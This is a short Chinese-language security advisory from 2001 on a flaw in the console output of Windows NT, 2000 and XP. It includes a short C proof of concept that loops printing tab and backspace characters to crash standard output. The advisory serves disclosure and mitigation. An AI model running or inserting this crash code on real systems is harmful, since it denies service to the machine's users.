发布日期：2001-10-26
更新日期：2001-10-30

受影响系统：

Microsoft Windows XP
Microsoft Windows 2000 SP2
Microsoft Windows 2000 SP1
Microsoft Windows 2000
Microsoft Windows NT 4.0SP6a
Microsoft Windows NT 4.0SP6
Microsoft Windows NT 4.0SP5
Microsoft Windows NT 4.0SP4
Microsoft Windows NT 4.0SP3
Microsoft Windows NT 4.0SP2
Microsoft Windows NT 4.0SP1
Microsoft Windows NT 4.0

描述：

---

BUGTRAQ ID: 3478

Windows NT, 2000 和 XP 操作系统的标准输出系统存在安全漏洞，通过发送特定的空
格序列，可能导致标准输出系统崩溃。

<*来源：Michael Wojcik （Michael.Wojcik@merant.com）
  链接：http://archives.neohapsis.com/archives/bugtraq/2001-10/0250.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Michael Wojcik （Michael.Wojcik@merant.com）提供了如下测试代码：

#include <stdio.h>

int main(void)
{
while (1)
printf("\t\t\b\b\b\b\b\b");
return 0;
}


建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 通过策略限制不可信用户对系统的访问

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.microsoft.com


浏览次数：3623
严重程度：0（网友投票）